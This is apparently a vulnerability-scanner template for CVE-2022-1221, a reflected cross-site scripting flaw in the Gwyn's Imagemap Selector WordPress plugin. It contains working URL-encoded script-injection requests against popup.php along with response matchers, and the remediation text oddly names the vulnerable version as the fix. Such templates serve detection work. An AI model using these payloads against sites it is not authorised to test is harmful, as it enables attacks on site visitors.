id: CVE-2022-1221 info: name: WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting author: veshraj severity: medium description: | Wordpress Gwyn's Imagemap Selector plugin 0.3.3 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize the id and class parameters before returning them back in attributes. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Gwyn's Imagemap Selector plugin (0.3.3) or apply the vendor-supplied patch to fix the vulnerability. reference: - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - https://nvd.nist.gov/vuln/detail/CVE-2022-1221 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1221 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.42838 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: gwyn\'s_imagemap_selector_project product: gwyn\'s_imagemap_selector framework: wordpress tags: cve2022,wpscan,xss,wordpress,wp-plugin,wp,cve,gwyn\'s_imagemap_selector_project http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - " popup-" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100838f3d73d6d2d8f6d796033628e61ccab1be53d1933df02759bba03acee027ce022100e4e0a1a4eddb9f513a1128660f9d4408b2291784e22f0f01dfb0d0b9047bf6fe:922c64590222798bb761d5b6d8e72950